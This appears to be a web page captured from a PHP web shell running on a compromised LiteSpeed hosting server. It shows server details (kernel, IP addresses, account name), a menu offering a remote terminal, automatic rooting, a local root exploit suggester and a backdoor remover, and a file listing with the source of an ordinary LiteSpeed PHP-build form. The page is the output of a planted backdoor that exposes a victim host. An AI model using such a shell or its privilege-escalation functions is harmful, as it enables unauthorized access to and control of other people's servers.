Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : klinikpe
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
admin /
html.6.0 /
utility /
build_php /
Delete
Unzip
Name
Size
Permission
Date
Action
buildPHP.php
567
B
-rw-r--r--
2021-05-27 17:20
buildProgress.php
367
B
-rw-r--r--
2021-05-27 17:20
buildStep1.php
1.48
KB
-rw-r--r--
2021-05-27 17:20
buildStep2.php
9.56
KB
-rw-r--r--
2021-05-27 17:20
buildStep3.php
3.46
KB
-rw-r--r--
2021-05-27 17:20
buildStep4.php
4.24
KB
-rw-r--r--
2021-05-27 17:20
build_common.template
565
B
-rw-r--r--
2021-05-27 17:20
build_install.template
4
KB
-rw-r--r--
2021-05-27 17:20
build_install_ext.template
1.72
KB
-rw-r--r--
2021-05-27 17:20
build_manual_run.template
1.05
KB
-rw-r--r--
2021-05-27 17:20
build_prepare.template
5.29
KB
-rw-r--r--
2021-05-27 17:20
build_prepare_ext.template
2.6
KB
-rw-r--r--
2021-05-27 17:20
buildconf.inc.php
2.11
KB
-rw-r--r--
2021-05-27 17:20
buildfunc.inc.php
28.68
KB
-rw-r--r--
2021-05-27 17:20
Save
Rename
<?php if (!defined('LEGAL')) return; echo '<h2 class="bottom_bar">' . TITLE . '</h2>'; if ( isset($check->pass_val['err']['bash'])) { echo '<div class="panel_error" align=left><span class="gui_error">' . $check->pass_val['err']['bash'] . '</span></div>'; } ?> <form name="buildphp" method="post"> <input type="hidden" name="step" value="1"> <table width="100%" class="xtbl" border="0" cellpadding="5" cellspacing="1"> <tr class="xtbl_header"> <td colspan="3" class="xtbl_title"> Step 1 : Select a PHP version </td> </tr> <?php $basevers = array_keys($PHP_VER); rsort($basevers); $buf = ''; foreach($basevers as $base_ver) { $versions = $PHP_VER[$base_ver]; $buf .= '<tr class="xtbl_value"><td class="xtbl_label">PHP ' . $base_ver . '</td><td class="icon"></td><td>'; $buf .= '<select name="php_version'. $base_ver . '">'; foreach( $versions as $o ) { $buf .= "<option value=\"$o\">$o</option>"; } $buf .= '</select> '; $buf .= '<input type="submit" name="build' . $base_ver . '" value="Next">' . "</td></tr>\n"; } echo $buf; ?> </table> </form> <p class="field_note"> * If you want to use a version not listed here, you can manually update the settings in /usr/local/lsws/admin/html/utility/build_php/buildconf.inc.php.</p> <p class="field_note"> ** For more information regarding LSPHP, please visit <a href="https://www.litespeedtech.com/support/wiki/doku.php/litespeed_wiki:php" target="_blank" rel="noopener noreferrer">LiteSpeed wiki</a>.</p>